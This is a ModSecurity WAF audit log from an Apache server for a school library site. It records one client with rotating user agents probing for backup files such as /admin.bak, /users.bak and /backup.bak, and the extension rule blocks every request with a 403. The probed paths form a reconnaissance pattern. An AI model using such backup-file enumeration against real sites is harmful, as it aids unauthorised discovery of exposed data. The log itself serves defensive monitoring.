"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882225615 1591 (- - -) Stopwatch2: 1747543882225615 1591; combined=631, p1=315, p2=288, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ecd6f15-Z-- --aed04b7c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8nwAAABY 103.236.140.4 56796 103.236.140.4 8181 --aed04b7c-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224467 --aed04b7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aed04b7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882243953 1782 (- - -) Stopwatch2: 1747543882243953 1782; combined=651, p1=305, p2=320, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aed04b7c-Z-- --aa1c1353-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8oAAAABU 103.236.140.4 56796 103.236.140.4 8181 --aa1c1353-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190533 --aa1c1353-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa1c1353-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882246352 1903 (- - -) Stopwatch2: 1747543882246352 1903; combined=709, p1=343, p2=338, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1c1353-Z-- --00d67309-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8owAAAA0 103.236.140.4 56796 103.236.140.4 8181 --00d67309-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436690 --00d67309-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00d67309-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882262222 1704 (- - -) Stopwatch2: 1747543882262222 1704; combined=663, p1=318, p2=318, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00d67309-Z-- --e37d2a24-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0QAAAIg 103.236.140.4 56816 103.236.140.4 8181 --e37d2a24-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224497 --e37d2a24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e37d2a24-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882268558 2328 (- - -) Stopwatch2: 1747543882268558 2328; combined=878, p1=435, p2=415, p3=0, p4=0, p5=28, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e37d2a24-Z-- --84941e7b-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0gAAAIo 103.236.140.4 56816 103.236.140.4 8181 --84941e7b-B-- GET /2014.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224502 --84941e7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --84941e7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882274176 1911 (- - -) Stopwatch2: 1747543882274176 1911; combined=683, p1=355, p2=301, p3=0, p4=0, p5=26, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84941e7b-Z-- --edc1c561-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0wAAAI4 103.236.140.4 56816 103.236.140.4 8181 --edc1c561-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224507 --edc1c561-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edc1c561-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882277936 1599 (- - -) Stopwatch2: 1747543882277936 1599; combined=653, p1=306, p2=282, p3=0, p4=0, p5=65, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edc1c561-Z-- --2956374f-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8pAAAAAs 103.236.140.4 56796 103.236.140.4 8181 --2956374f-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 113175755 --2956374f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2956374f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882290179 1710 (- - -) Stopwatch2: 1747543882290179 1710; combined=684, p1=330, p2=326, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2956374f-Z-- --914daf7d-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS1wAAAI0 103.236.140.4 56816 103.236.140.4 8181 --914daf7d-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224510 --914daf7d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --914daf7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882291441 1914 (- - -) Stopwatch2: 1747543882291441 1914; combined=681, p1=336, p2=319, p3=0, p4=0, p5=26, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --914daf7d-Z-- --8e0cf241-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS2AAAAJg 103.236.140.4 56816 103.236.140.4 8181 --8e0cf241-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:60.2.1) Gecko/20100101 Firefox/60.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224517 --8e0cf241-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8e0cf241-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882296497 2089 (- - -) Stopwatch2: 1747543882296497 2089; combined=861, p1=428, p2=394, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e0cf241-Z-- --2bb40029-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS2gAAAJA 103.236.140.4 56816 103.236.140.4 8181 --2bb40029-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224530 --2bb40029-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bb40029-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882308699 1590 (- - -) Stopwatch2: 1747543882308699 1590; combined=647, p1=310, p2=311, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb40029-Z-- --ce9c6d04-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8pwAAABQ 103.236.140.4 56796 103.236.140.4 8181 --ce9c6d04-B-- GET /admin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224557 --ce9c6d04-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce9c6d04-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882345898 1875 (- - -) Stopwatch2: 1747543882345898 1875; combined=674, p1=300, p2=348, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce9c6d04-Z-- --d83d4d1b-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8qwAAABI 103.236.140.4 56796 103.236.140.4 8181 --d83d4d1b-B-- GET /backup.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224584 --d83d4d1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d83d4d1b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882848845 3194 (- - -) Stopwatch2: 1747543882848845 3194; combined=1022, p1=371, p2=612, p3=0, p4=0, p5=38, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d83d4d1b-Z-- --1dc99d3e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8rgAAAAE 103.236.140.4 56796 103.236.140.4 8181 --1dc99d3e-B-- GET /bin.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093319 --1dc99d3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1dc99d3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882916278 1940 (- - -) Stopwatch2: 1747543882916278 1940; combined=806, p1=446, p2=332, p3=0, p4=0, p5=28, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc99d3e-Z-- --52899425-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8rwAAABA 103.236.140.4 56796 103.236.140.4 8181 --52899425-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093322 --52899425-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52899425-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882928863 2467 (- - -) Stopwatch2: 1747543882928863 2467; combined=964, p1=515, p2=419, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52899425-Z-- --c5039d03-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS3gAAAJE 103.236.140.4 56816 103.236.140.4 8181 --c5039d03-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 61846747 --c5039d03-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c5039d03-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882964688 2053 (- - -) Stopwatch2: 1747543882964688 2053; combined=694, p1=324, p2=343, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5039d03-Z-- --ab633014-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS4AAAAJM 103.236.140.4 56816 103.236.140.4 8181 --ab633014-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 61846761 --ab633014-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ab633014-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882983928 1698 (- - -) Stopwatch2: 1747543882983928 1698; combined=678, p1=311, p2=339, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
